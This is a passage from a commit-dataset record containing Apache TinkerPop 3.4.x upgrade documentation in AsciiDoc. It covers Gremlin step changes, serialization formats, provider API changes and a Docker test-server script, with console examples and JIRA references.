by(__.values(\"name\")).\n......4> select(\"a\").select(\"a\")\n==>[a:marko]\n----\n\nAbove is the old behavior; the second `select(\"a\")` has no effect, it selects the side-effect `a` again, although one\nwould expect to get the map entry `a`. What follows is the new behavior:\n\n[source,groovy]\n----\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\")\n==>[a:marko]\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\").select(\"a\")\n==>marko\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1522[TINKERPOP-1522]\n\n==== GraphSON BulkSet\n\nIn earlier versions of TinkerPop, `BulkSet` was coerced to a `List` for GraphSON which was convenient in that it\ndidn't add a new data type to support, but inconvenient in that it meant that certain process tests were not consistent\nin terms of how they ran and the benefits of the `BulkSet` were \"lost\" in that the \"bulk\" was being resolved server\nside. With the addition of `BulkSet` as a GraphSON type the \"bulk\" is now resolved on the client side by the language\nvariant. How that resolution occurs depends upon the language variant. For Java, there is a `BulkSet` object which\nmaintains that structure sent from the server. For the other variants, the `BulkSet` is deserialized to a `List` form\nwhich results in a much larger memory footprint than what is contained the `BulkSet`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2111[TINKERPOP-2111]\n\n=== Upgrading for Providers\n\n==== Graph Database Providers\n\n===== io() Step\n\nThe new `io()`-step that was introduced provides some new changes to consider. Note that `Graph.io()` has been\ndeprecated and users are no longer instructed to utilize that method. It is not yet decided when that method will be\nremoved completely, but given the public nature of it and the high chance of common usage, it should be hanging around\nfor some time.\n\nAs with any step in Gremlin, it is possible to replace it with a more provider specific implementation that could be\nmore efficient. Developing a `TraversalStrategy` to do this is encouraged, especially for those graph providers who\nmight have special bulk loaders that could be abstracted by this step. Examples of this are already shown with\n`HadoopGraph` which replaces the simple single-threaded loader with `CloneVertexProgram`. Graph providers are\nencouraged to use the `with()` step to capture any necessary configurations required for their underlying loader to\nwork. Graph providers should not feel restricted to `graphson`, `gryo` and `graphml` formats either. If a graph\nsupports CSV or some custom graph specific format, it shouldn't be difficult to gather the configurations necessary to\nmake that available to users.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1996[TINKERPOP-1996]\n\n===== Caching Graph Features\n\nFor graph implementations that have expensive creation times, it can be time consuming to run the TinkerPop test suite\nas each test run requires a `Graph` instance even if the test is ultimately ignored becaue it doesn't pass the feature\nchecks. To possibly help alleviate this problem, the `GraphProvider` interface now includes this method:\n\n[source,java]\n----\npublic default Optional<Graph.Features> getStaticFeatures() {\n return Optional.empty();\n}\n----\n\nThis method can be implemented to return a cacheable set of features for a `Graph` generated from that `GraphProvider`.\nAssuming this method is faster than the cost of creating a new `Graph` instance, the test suite should execute\nsignificantly faster depending on how many tests end up being ignored.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1518[TINKERPOP-1518]\n\n===== Configuring Interface\n\nThere were some changes to interfaces that were related to `Step`. A new `Configuring` interface was added that was\nhelpful in the implementation of the `with()`-step modulator. This new interface extends the `Parameterizing` interface\n(which moved to the `org.apache.tinkerpop.gremlin.process.traversal.step` package with the other step interfaces) and\nin turn is extended by the `Mutating` interface. Making this change meant that the `Mutating.addPropertyMutations()`\nmethod could be removed in favor of the new `Configuring.configure()` method.\n\nAll of the changes above basically mean, that if the `Mutating` interface was being used in prior versions, the\n`addPropertyMutations()` method simply needs to be changed to `configure()`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1975[TINKERPOP-1975]\n\n===== OptionsStrategy\n\n`OptionsStrategy` is a `TraversalStrategy` that makes it possible for users to set arbitrary configurations on a\n`Traversal`. These configurations can be used by graph providers to allow for traversal-level configurations to be\naccessible to their custom steps. A user would write something like:\n\n[source,java]\n----\ng.withStrategies(OptionsStrategy.build().with(\"specialLimit\", 10000).create()).V();\n----\n\nThe `OptionsStrategy` is really only the carrier for the configurations and while users can choose to utilize that\nmore verbose method for constructing it shown above, it is more elegantly constructed as follows using `with()`-step:\n\n[source,java]\n----\ng.with(\"specialLimit\", 10000)).V();\n----\n\nThe graph provider could then access that value of \"specialLimit\" in their custom step (or elsewhere) as follows:\n\n[source,java]\n----\nOptionsStrategy strategy = this.getTraversal().asAdmin().getStrategies().getStrategy(OptionsStrategy.class).get();\nint specialLimit = (int) strategy.getOptions().get(\"specialLimit\");\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2053[TINKERPOP-2053]\n\n===== Removed hadoop-gremlin Test Artifact\n\nThe `hadoop-gremlin` module no longer generates a test jar that can be used as a test dependency in other modules.\nGenerally speaking, that approach tends to be a bad practice and can cause build problems with Maven that aren't always\nobvious to troubleshoot. With the removal of `giraph-gremlin` for 3.4.0, it seemed even less useful to have this\ntest artifact present. All tests are still present. The follow provides a basic summary of how this refactoring\noccurred:\n\n* A new `AbstractFileGraphProvider` was created in `gremlin-test` which provided a lot of the features that\n`HadoopGraphProvider` was exposing. Both `HadoopGraphProvider` and `SparkHadoopGraphProvider` extend from that class\nnow.\n* `ToyIoRegistry` and related classes were moved to `gremlin-test`.\n* The various tests that validated capabilities of `Storage` have been moved to `spark-gremlin` and are part of those\ntests now. Obviously, that makes those tests specific to Spark testing now. If that location creates a problem for some\nreason, that decision can be revisited at some point.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1410[TINKERPOP-1410]\n\n===== TraversalEngine Moved\n\nThe `TraversalEngine` interface was deprecated in 3.2.0 along with all related methods that used it and classes that\nimplemented it. It was replaced by the `Computer` interface and provided a much nicer way to plug different\nimplementations of `Computer` into a traversal. `TraversalEngine` was never wholly removed however as it had some deep\ndependencies in the inner workings of the test suite. That infrastructure has largely remained as is until now.\n\nAs of 3.4.0, `TraversalEngine` is no longer in `gremlin-core` and can instead be found in `gremlin-test` as it is\neffectively a \"test-only\" component and serves no other real function. As explained in the javadocs going back to\n3.2.0, providers should implement the `Computer` class and use that instead. At this point, graph providers should have\nlong ago moved to the `Computer` infrastructure as methods for constructing a `TraversalSource` with a\n`TraversalEngine` were long ago removed.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1143[TINKERPOP-1143]\n\n===== Upsert Graph Feature\n\nSome `Graph` implementations may be able to offer upsert functionality for vertices and edges, which can help improve\nusability and performance. To help make it clear to users that a graph operates in this fashion, the `supportsUpsert()`\nfeature has been added to both `Graph.VertexFeatures` and `Graph.EdgeFeatures`. By default, both of these methods will\nreturn `false`.\n\nShould a provider wish to support this feature, the behavior of `addV()` and\/or `addE()` should change such that when\na vertex or edge with the same identifier is provided, the respective step will insert the new element if that value\nis not present or update an existing element if it is found. The method by which the provider \"identifies\" an element\nis completely up to the capabilities of that provider. In the most simple fashion, a graph could simply check the\nvalue of the supplied `T.id`, however graphs that support some form of schema will likely have other methods for\ndetermining whether or not an existing element is present.\n\nThe extent to which TinkerPop tests \"upsert\" is fairly narrow. Graph providers that choose to support this feature\nshould consider their own test suites carefully to ensure appropriate coverage.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1685[TINKERPOP-1685]\n\n===== TypeTranslator Changes\n\nThe `TypeTranslator` experienced a change in its API and `GroovyTranslator` a change in expectations.\n\n`TypeTranslator` now implements `BiFunction` and takes the graph traversal source name as an argument along with the\nobject to translate. This interface is implemented by default for Groovy with `GroovyTranslator.DefaultTypeTranslator`\nwhich encapsulates all the functionality of what `GroovyTranslator` formerly did by default. To provide customize\ntranslation, simply extend the `DefaultTypeTranslator` and override the methods.\n\n`GroovyTranslator` now expects that the `TypeTranslator` provide to it as part of its `of()` static method overload\nis \"complete\" - i.e. that it provides all the functionality to translate the types passed to it. Thus, a \"complete\"\n`TypeTranslator` is one that does everything that `DefaultTypeTranslator` does as a minimum requirement. Therefore,\nthe extension model described above is the easiest way to get going with a custom `TypeTranslator` approach.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2072[TINKERPOP-2072]\n\n==== Graph Driver Providers\n\n===== Deprecation Removal in RemoteConnection\n\nThe two deprecated synchronous `submit()` methods on the `RemoteConnection` interface have been removed, which means\nthat `RemoteConnection` implementations will need to implement `submitAsync(Bytecode)` if they have not already done\nso.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2103[TINKERPOP-2103]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8acc003553b97f388f437594375187860428efa2","subject":"Added upgrade docs for docker Gremlin Server test config","message":"Added upgrade docs for docker Gremlin Server test config\n","repos":"krlohnes\/tinkerpop,apache\/tinkerpop,apache\/incubator-tinkerpop,apache\/tinkerpop,robertdale\/tinkerpop,apache\/tinkerpop,robertdale\/tinkerpop,krlohnes\/tinkerpop,pluradj\/incubator-tinkerpop,apache\/tinkerpop,apache\/incubator-tinkerpop,robertdale\/tinkerpop,apache\/tinkerpop,apache\/tinkerpop,apache\/incubator-tinkerpop,apache\/tinkerpop,pluradj\/incubator-tinkerpop,krlohnes\/tinkerpop,krlohnes\/tinkerpop,robertdale\/tinkerpop,robertdale\/tinkerpop,krlohnes\/tinkerpop,pluradj\/incubator-tinkerpop","old_file":"docs\/src\/upgrade\/release-3.4.x.asciidoc","new_file":"docs\/src\/upgrade\/release-3.4.x.asciidoc","new_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\n\n= TinkerPop 3.4.0\n\nimage::https:\/\/raw.githubusercontent.com\/apache\/tinkerpop\/master\/docs\/static\/images\/avant-gremlin.png[width=225]\n\n*Avant-Gremlin Construction #3 for Theremin and Flowers*\n\n== TinkerPop 3.4.3\n\n*Release Date: NOT OFFICIALLY RELEASED YET*\n\nPlease see the link:https:\/\/github.com\/apache\/tinkerpop\/blob\/3.4.3\/CHANGELOG.asciidoc#release-3-4-3[changelog] for a complete list of all the modifications that are part of this release.\n\n=== Upgrading for Providers\n\n==== Graph Driver Providers\n\n===== Gremlin Server Test Configuration\n\nGremlin Server has a test configuration built into its Maven build process which all integration tests and Gremlin\nLanguage Variants use to validate their operations. While this approach has worked really well for test automation\nwithin Maven, there are often times where it would be helpful to simply have Gremlin Server running with that\nconfiguration. This need is especially true when developing Gremlin Language Variants which is something that is done\noutside of the JVM.\n\nThis release introduces a Docker script that will start Gremlin Server with this test configuration. It can be started\nwith:\n\n[source,text]\ndocker\/gremlin-server.sh\n\nOnce started, it is then possible to run GLV tests directly from a debugger against this instance which should\nhopefully reduce development friction.\n\n== TinkerPop 3.4.2\n\n*Release Date: May 28, 2019*\n\nPlease see the link:https:\/\/github.com\/apache\/tinkerpop\/blob\/3.4.2\/CHANGELOG.asciidoc#release-3-4-2[changelog] for a complete list of all the modifications that are part of this release.\n\n=== Upgrading for Users\n\n==== Per Request Options\n\nIn 3.4.0, the notion of `RequestOptions` were added so that users could have an easier way to configure settings on\nindividual requests made through the Java driver. While that change provided a way to set those configurations for\nscript based requests, it didn't include options to make those settings in a `Traversal` submitted via `Bytecode`. In\nthis release those settings become available via `with()` step on the `TraversalSource` as follows:\n\n[source,java]\n----\nGraphTraversalSource g = traversal().withRemote(conf);\nList<Vertex> vertices = g.with(RemoteConnection.PER_REQUEST_TIMEOUT, 500).V().out(\"knows\").toList()\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2211[TINKERPOP-2211]\n\n==== Gremlin Console Timeout\n\nThe Gremlin Console timeout that is set by `:remote config timeout x` was client-side only in prior versions, which\nmeant that if the console timeout was less than the server timeout the client would timeout but the server might still\nbe processing the request. Similarly, a longer timeout on the console would not change the server and the timeout\nwould occur sooner than expected. These discrepancies often led to confusion.\n\nAs of 3.4.0, the Java Driver API allowed for timeout settings to be more easily passed per request, so the console\nwas modified for this current version to pass the console timeout for each remote submission thus yielding more\nconsistent and intuitive behavior.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2203[TINKERPOP-2203]\n\n=== Upgrading for Providers\n\n==== Graph System Providers\n\n===== Warnings\n\nIt is now possible to pass warnings over the Gremlin Server protocol using a `warnings` status attribute. The warnings\nare expected to be a string value or a `List` of string values which can be consumed by the user or tools that check\nfor that status attribute. Note that Gremlin Console is one such tool that will respond to this status attribute - it\nwill print the messages to the console as they are detected when doing remote script submissions.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2216[TINKERPOP-2216]\n\n==== Graph Driver Providers\n\n===== GraphBinary API Change\n\nIn GraphBinary serialization, Java `write()` and `writeValue()` from `TypeSerializer<T>` interface now take a Netty's\n`ByteBuf` instance instead of an `ByteBufAllocator`, that way the same buffer instance gets reused during the write\nof a message. Additionally, we took the opportunity to remove the unused parameter from `ResponseMessageSerializer`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2161[TINKERPOP-2161]\n\n== TinkerPop 3.4.1\n\n*Release Date: March 18, 2019*\n\nPlease see the link:https:\/\/github.com\/apache\/tinkerpop\/blob\/3.4.1\/CHANGELOG.asciidoc#release-3-4-1[changelog] for a complete list of all the modifications that are part of this release.\n\n=== Upgrading for Users\n\n==== Mix SPARQL and Gremlin\n\nIn the initial release of `sparql-gremlin` it was only possible to execute a SPARQL query and have it translate to\nGremlin. Therefore, it was only possible to write a query like this:\n\n[source,text]\n----\ngremlin> g.sparql(\"SELECT ?name ?age WHERE { ?person v:name ?name . ?person v:age ?age }\")\n==>[name:marko,age:29]\n==>[name:vadas,age:27]\n==>[name:josh,age:32]\n==>[name:peter,age:35]\ngremlin> g.sparql(\"SELECT * WHERE { }\")\n==>v[1]\n==>v[2]\n==>v[3]\n==>v[4]\n==>v[5]\n==>v[6]\n----\n\nIn this release, however, it is now possible to further process that result with Gremlin steps:\n\n[source,text]\n----\ngremlin> g.sparql(\"SELECT ?name ?age WHERE { ?person v:name ?name . ?person v:age ?age }\").select(\"name\")\n==>marko\n==>vadas\n==>josh\n==>peter\ngremlin> g.sparql(\"SELECT * WHERE { }\").out(\"knows\").values(\"name\")\n==>vadas\n==>josh\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2171[TINKERPOP-2171],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.1\/reference\/#sparql-with-gremlin[Reference Documentation]\n\n=== Upgrading for Providers\n\n==== Graph Database Providers\n\n===== GraphBinary Serializer Changes\n\nIn GraphBinary serialization, Java `write()` and `writeValue()` from `TypeSerializer<T>` interface now take a Netty's\n`ByteBuf` instance instead of an `ByteBufAllocator`, that way the same buffer instance gets reused during the write\nof a message. Additionally, we took the opportunity to remove the unused parameter from `ResponseMessageSerializer`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2161[TINKERPOP-2161]\n\n== TinkerPop 3.4.0\n\n*Release Date: January 2, 2019*\n\nPlease see the link:https:\/\/github.com\/apache\/tinkerpop\/blob\/3.4.0\/CHANGELOG.asciidoc#release-3-4-0[changelog] for a complete list of all the modifications that are part of this release.\n\n=== Upgrading for Users\n\n==== sparql-gremlin\n\nThe `sparql-gremlin` module is a link:https:\/\/en.wikipedia.org\/wiki\/SPARQL[SPARQL] to Gremlin compiler, which allows\nSPARQL to be executed over any TinkerPop-enabled graph system.\n\n[source,groovy]\n----\ngraph = TinkerFactory.createModern()\ng = graph.traversal(SparqlTraversalSource)\ng.sparql(\"\"\"SELECT ?name ?age\n WHERE { ?person v:name ?name . ?person v:age ?age }\n ORDER BY ASC(?age)\"\"\")\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1878[TINKERPOP-1878],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#sparql-gremlin[Reference Documentation]\n\n==== Gremlin.NET Driver Improvements\n\nThe Gremlin.NET driver now uses request pipelining. This allows connections to be reused for different requests in\nparallel which should lead to better utilization of connections. The `ConnectionPool` now also has a fixed size\nwhereas it could previously create an unlimited number of connections. Each `Connection` can handle up to\n`MaxInProcessPerConnection` requests in parallel. If this limit is reached for all connections, then a\n`NoConnectionAvailableException` is thrown which makes this a breaking change.\n\nThese settings can be set as properties on the `ConnectionPoolSettings` instance that can be passed to the `GremlinClient`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1774[TINKERPOP-1774],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1775[TINKERPOP-1775],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#_connection_pool[Reference Documentation]\n\n==== Indexing of Collections\n\nTinkerPop 3.4.0 adds a new `index()`-step, which allows users to transform simple collections into index collections or maps.\n\n```\ngremlin> g.V().hasLabel(\"software\").values(\"name\").fold().\n......1> order(local).\n......2> index().unfold()\n==>[lop,0]\n==>[ripple,1]\ngremlin> g.V().hasLabel(\"person\").values(\"name\").fold().\n......1> order(local).by(decr).\n......2> index().\n......3> with(WithOptions.indexer, WithOptions.map)\n==>[0:vadas,1:peter,2:marko,3:josh]\n```\n\n==== Modulation of valueMap()\n\nThe `valueMap()` step now supports `by` and `with` modulation, which also led to the deprecation of `valueMap(true)` overloads.\n\n===== by() Modulation\n\nWith the help of the `by()` modulator `valueMap()` result values can now be adjusted, which is particularly useful to turn multi-\/list-values into single values.\n\n```\ngremlin> g.V().hasLabel(\"person\").valueMap()\n==>[name:[marko],age:[29]]\n==>[name:[vadas],age:[27]]\n==>[name:[josh],age:[32]]\n==>[name:[peter],age:[35]]\ngremlin> g.V().hasLabel(\"person\").valueMap().by(unfold())\n==>[name:marko,age:29]\n==>[name:vadas,age:27]\n==>[name:josh,age:32]\n==>[name:peter,age:35]\n```\n===== with() Modulation\n\nThe `with()` modulator can be used to include certain tokens (`id`, `label`, `key` and\/or `value`).\n\nThe old way (still valid, but deprecated):\n\n```\ngremlin> g.V().hasLabel(\"software\").valueMap(true)\n==>[id:10,label:software,name:[gremlin]]\n==>[id:11,label:software,name:[tinkergraph]]\ngremlin> g.V().has(\"person\",\"name\",\"marko\").properties(\"location\").valueMap(true)\n==>[id:6,key:location,value:san diego,startTime:1997,endTime:2001]\n==>[id:7,key:location,value:santa cruz,startTime:2001,endTime:2004]\n==>[id:8,key:location,value:brussels,startTime:2004,endTime:2005]\n==>[id:9,key:location,value:santa fe,startTime:2005]\n```\n\nThe new way:\n\n```\ngremlin> g.V().hasLabel(\"software\").valueMap().with(WithOptions.tokens)\n==>[id:10,label:software,name:[gremlin]]\n==>[id:11,label:software,name:[tinkergraph]]\ngremlin> g.V().has(\"person\",\"name\",\"marko\").properties(\"location\").valueMap().with(WithOptions.tokens)\n==>[id:6,key:location,value:san diego,startTime:1997,endTime:2001]\n==>[id:7,key:location,value:santa cruz,startTime:2001,endTime:2004]\n==>[id:8,key:location,value:brussels,startTime:2004,endTime:2005]\n==>[id:9,key:location,value:santa fe,startTime:2005]\n```\n\nFurthermore, now there's a finer control over which of the tokens should be included:\n\n```\ngremlin> g.V().hasLabel(\"software\").valueMap().with(WithOptions.tokens, WithOptions.labels)\n==>[label:software,name:[gremlin]]\n==>[label:software,name:[tinkergraph]]\ngremlin> g.V().has(\"person\",\"name\",\"marko\").properties(\"location\").valueMap().with(WithOptions.tokens, WithOptions.values)\n==>[value:san diego,startTime:1997,endTime:2001]\n==>[value:santa cruz,startTime:2001,endTime:2004]\n==>[value:brussels,startTime:2004,endTime:2005]\n==>[value:santa fe,startTime:2005]\n```\n\nAs shown above, the support of the `with()` modulator for `valueMap()` makes the `valueMap(boolean)` overload\nsuperfluous, hence this overload is now deprecated. This is a breaking API change, since `valueMap()` will now always\nyield instances of type `Map<Object, Object>`. Prior this change only the `valueMap(boolean)` overload yielded\n`Map<Object, Object>` objects, `valueMap()` without the boolean parameter used to yield instances of type\n`Map<String, Object>`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2059[TINKERPOP-2059]\n\n==== Predicate Number Comparison\n\nIn previous versions `within()` and `without()` performed strict number comparisons; that means these predicates did\nnot only compare number values, but also the type. This was inconsistent with how other predicates (like `eq`, `gt`,\netc.) work. All predicates will now ignore the number type and instead compare numbers only based on their value.\n\nOld behavior:\n\n```\ngremlin> g.V().has(\"age\", eq(32L))\n==>v[4]\ngremlin> g.V().has(\"age\", within(32L, 35L))\ngremlin>\n```\n\nNew behavior:\n\n```\ngremlin> g.V().has(\"age\", eq(32L))\n==>v[4]\ngremlin> g.V().has(\"age\", within(32L, 35L))\n==>v[4]\n==>v[6]\n```\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2058[TINKERPOP-2058]\n\n==== ReferenceElementStrategy\n\nGremlin Server has had some inconsistent behavior in the serialization of the results it returns. Remote traversals\nbased on Gremlin bytecode always detach returned graph elements to \"reference\" (i.e. removes properties and only\ninclude the `id` and `label`), but scripts would detach graph elements and include the properties. For 3.4.0,\nTinkerPop introduces the `ReferenceElementStrategy` which can be configured on a `GraphTraversalSource` to always\ndetach to \"reference\".\n\n[source,text]\n----\ngremlin> graph = TinkerFactory.createModern()\n==>tinkergraph[vertices:6 edges:6]\ngremlin> g = graph.traversal().withStrategies(ReferenceElementStrategy.instance())\n==>graphtraversalsource[tinkergraph[vertices:6 edges:6], standard]\ngremlin> v = g.V().has('person','name','marko').next()\n==>v[1]\ngremlin> v.class\n==>class org.apache.tinkerpop.gremlin.structure.util.reference.ReferenceVertex\ngremlin> v.properties()\ngremlin>\n----\n\nThe packaged initialization scripts that come with Gremlin Server now pre-configure the sample graphs with this\nstrategy to ensure that both scripts and bytecode based requests over any protocol (HTTP, websocket, etc) and\nserialization format all return a \"reference\". To revert to the old form, simply remove the strategy in the\ninitialization script.\n\nIt is recommended that users choose to configure their `GraphTraversalSource` instances with `ReferenceElementStrategy`\nas working with \"references\" only is the recommended method for developing applications with TinkerPop. In the future,\nit is possible that `ReferenceElementStrategy` will be configured by default for all graphs on or off Gremlin Server,\nso it would be best to start utilizing it now and grooming existing Gremlin and related application code to account\nfor it.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2075[TINKERPOP-2075]\n\n==== Text Predicates\n\nGremlin now supports simple text predicates on top of the existing `P` predicates. Both, the new `TextP` text\npredicates and the old `P` predicates, can be chained using `and()` and `or()`.\n\n[source,groovy]\n----\ngremlin> g.V().has(\"person\",\"name\", containing(\"o\")).valueMap()\n==>[name:[marko],age:[29]]\n==>[name:[josh],age:[32]]\ngremlin> g.V().has(\"person\",\"name\", containing(\"o\").and(gte(\"j\").and(endingWith(\"ko\")))).valueMap()\n==>[name:[marko],age:[29]]\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2041[TINKERPOP-2041]\n\n==== Changed Infix Behavior\n\nThe infix notation of `and()` and `or()` now supports an arbitrary number of traversals and `ConnectiveStrategy`\nproduces a traversal with proper AND and OR semantics.\n\n```\nInput: a.or.b.and.c.or.d.and.e.or.f.and.g.and.h.or.i\n\n*BEFORE*\nOutput: or(a, or(and(b, c), or(and(d, e), or(and(and(f, g), h), i))))\n\n*NOW*\nOutput: or(a, and(b, c), and(d, e), and(f, g, h), i)\n```\n\nFurthermore, previous versions failed to apply 3 or more `and()` steps using the infix notation, this is now fixed.\n\n[source,groovy]\n----\ngremlin> g.V().has(\"name\",\"marko\").and().has(\"age\", lt(30)).or().has(\"name\",\"josh\").and().has(\"age\", gt(30)).and().out(\"created\")\n==>v[1]\n==>v[4]\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2029[TINKERPOP-2029]\n\n==== GraphBinary\n\nGraphBinary is a new language agnostic, network serialization format designed to replace Gryo and GraphSON. At this\ntime it is only available on the JVM, but support will be added for other languages in upcoming releases. The\nserializer has been configured in Gremlin Server's packaged configuration files. The serializer can be configured\nusing the Java driver as follows:\n\n[source,java]\n----\nCluster cluster = Cluster.build(\"localhost\").port(8182).\n serializer(Serializers.GRAPHBINARY_V1D0).create();\nClient client = cluster.connect();\nList<Result> r = client.submit(\"g.V().has('person','name','marko')\").all().join();\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1942[TINKERPOP-1942],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/dev\/io\/#graphbinary[IO Documentation]\n\n==== Status Attributes\n\nThe Gremlin Server protocol allows for status attributes to be returned in responses. These attributes were typically\nfor internal use, but were designed with extensibility in mind so that providers could place return their own\nattributes to calling clients. Unfortunately, unless the client was being used with protocol level requests (which\nwasn't convenient) those attributes were essentially hidden from view. As of this version however, status attributes\nare fully retrievable for both successful requests and exceptions.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1913[TINKERPOP-1913]\n\n==== with() Step\n\nThis version of TinkerPop introduces the `with()`-step to Gremlin. It isn't really a step but is instead a step\nmodulator. This modulator allows the step it is modifying to accept configurations that can be used to alter the\nbehavior of the step itself. A good example of its usage is shown with the revised syntax of the `pageRank()`-step\nwhich now uses `with()` to replace the old `by()` options:\n\n[source,groovy]\n----\ng.V().hasLabel('person').\n pageRank().\n with(PageRank.edges, __.outE('knows')).\n with(PageRank.propertyName, 'friendRank').\n order().\n by('friendRank',desc).\n valueMap('name','friendRank')\n----\n\nA similar change was made for `peerPressure()`-step:\n\n[source,groovy]\n----\ng.V().hasLabel('person').\n peerPressure().\n with(PeerPressure.propertyName, 'cluster').\n group().\n by('cluster').\n by('name')\n----\n\nNote that the `by()` modulators still work, but should be considered deprecated and open for removal in a future\nrelease where breaking changes are allowed.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1975[TINKERPOP-1975],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#with-step[Reference Documentation]\n\n==== shortestPath() Step\n\nCalculating the link:https:\/\/en.wikipedia.org\/wiki\/Shortest_path_problem[shortest path] between vertices is a common\ngraph use case. While the traversal to determine a shortest path can be expressed in Gremlin, this particular problem\nis common enough that the feature has been encapsulated into its own step, demonstrated as follows:\n\n[source,text]\n----\ngremlin> g.withComputer().V().has('name','marko').\n......1> shortestPath().with(ShortestPath.target, has('name','peter'))\n==>[v[1],v[3],v[6]]\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1990[TINKERPOP-1990],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#shortestpath-step[Reference Documentation]\n\n==== connectedComponent() Step\n\nIn prior version of TinkerPop, it was recommended that the identification of\nlink:https:\/\/en.wikipedia.org\/wiki\/Connected_component_(graph_theory)[Connected Component] instances in a graph be\ncomputed by way of a reasonably complex bit of Gremlin that looked something like this:\n\n[source,groovy]\n----\ng.V().emit(cyclicPath().or().not(both())).repeat(both()).until(cyclicPath()).\n path().aggregate(\"p\").\n unfold().dedup().\n map(__.as(\"v\").select(\"p\").unfold().\n filter(unfold().where(eq(\"v\"))).\n unfold().dedup().order().by(id).fold()).\n dedup()\n----\n\nThe above approach had a number of drawbacks that included a large execution cost as well as incompatibilities in OLAP.\nTo simplify usage of this commonly use graph algorithm, TinkerPop 3.4.0 introduces the `connectedComponent()` step\nwhich reduces the above operation to:\n\n[source,groovy]\n----\ng.withComputer().V().connectedComponent()\n----\n\nIt is important to note that this step does require the use of a `GraphComputer` to work, as it utilizes a\n`VertexProgram` behind the scenes.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1967[TINKERPOP-1967],\nlink:http:\/\/tinkerpop.apache.org\/docs\/x.y.z\/reference\/#connectedcomponent-step[Reference Documentation]\n\n==== io() Step\n\nThere have been some important changes to IO operations for reading and writing graph data. The use of `Graph.io()`\nhas been deprecated to further remove dependence on the Graph (Structure) API for users and to extend these basic\noperations to GLV users by making these features available as part of the Gremlin language.\n\nIt is now possible to simply use Gremlin:\n\n[source,groovy]\n----\ngraph = ...\ng = graph.traversal()\ng.io(someInputFile).read().iterate()\ng.io(someOutputFile).write().iterate()\n----\n\nWhile `io()`-step is still single-threaded for OLTP style loading, it can be utilized in conjunction with OLAP which\ninternally uses `CloneVertexProgram` and therefore any graph `InputFormat` or `OutputFormat` can be configured in\nconjunction with this step for parallel loads of large datasets.\n\nIt is also worth noting that the `io()`-step may be overridden by graph providers to utilize their native bulk-loading\nfeatures, so consult the documentation of the implementation being used to determine if there are any improved\nefficiencies there.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1996[TINKERPOP-1996],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#io-step[Reference Documentation]\n\n==== Per Request Options\n\nThe Java driver now allows for various options to be set on a per-request basis via new overloads to `submit()` that\naccept `RequestOption` instances. A good use-case for this feature is to set a per-request override to the\n`scriptEvaluationTimeout` so that it only applies to the current request.\n\n[source,java]\n----\nCluster cluster = Cluster.open();\nClient client = cluster.connect();\nRequestOptions options = RequestOptions.build().timeout(500).create();\nList<Result> result = client.submit(\"g.V()\", options).all().get();\n----\n\nSee: 